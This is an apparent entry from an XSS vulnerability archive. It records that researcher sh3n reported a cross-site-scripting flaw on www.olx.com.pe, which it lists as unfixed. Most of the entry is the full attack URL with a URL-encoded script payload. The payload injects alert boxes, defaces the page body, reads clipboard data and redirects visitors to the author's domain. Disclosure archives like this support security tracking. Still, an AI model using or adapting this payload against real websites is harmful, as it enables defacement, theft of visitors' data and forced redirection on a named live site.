Security researcher sh3n, has submitted on 12/07/2010 a cross-site-scripting (XSS) vulnerability affecting www.olx.com.pe, which at the time of submission ranked 12100 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 12/07/2010 |
Date published: 13/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: sh3n |
Domain: www.olx.com.pe |
Category: XSS |
Pagerank: 12100 |
URL: http://www.olx.com.pe/searchpages.php?searchbox=%3CSCRIPT%3Ealert%28%22Xacked%22%29;%3C/SCRIPT%3E%3C SCRIPT%3Ealert%28%22XSS%20PWN%22%29;%3C/SCRIPT%3E%3CSCRIPT%3Ealert%28%22sh3n.net%22%29;%3C/SCRIPT%3E %3Cscript%3Efunction%20do_main%28%29{document.body.innerHTML%20=%20%22Xacked%20by%20sh3n%22;}do_main %28%29;return_result%28result_id,%20%22Site%20defaced%22%29;%3C/script%3E%3Cscript%3Ereturn_result%2 8result_id,%20clipboardData.getData%28%22sh3n%22%29%29;%3C/script%3E%3CSCRIPT%3Ealert%28%22Xacked%20 by%20sh3n%22%29;%3C/SCRIPT%3E%3Cscript%3Efunction%20do_main%28%29{return_result%28result_id,%20%22i% 20pwn%20you%22%29;window.location%20=%20%22www.sh3n.net%22;}do_main%28%29;%3C/script%3E |
Click here to view the mirror
|
|
|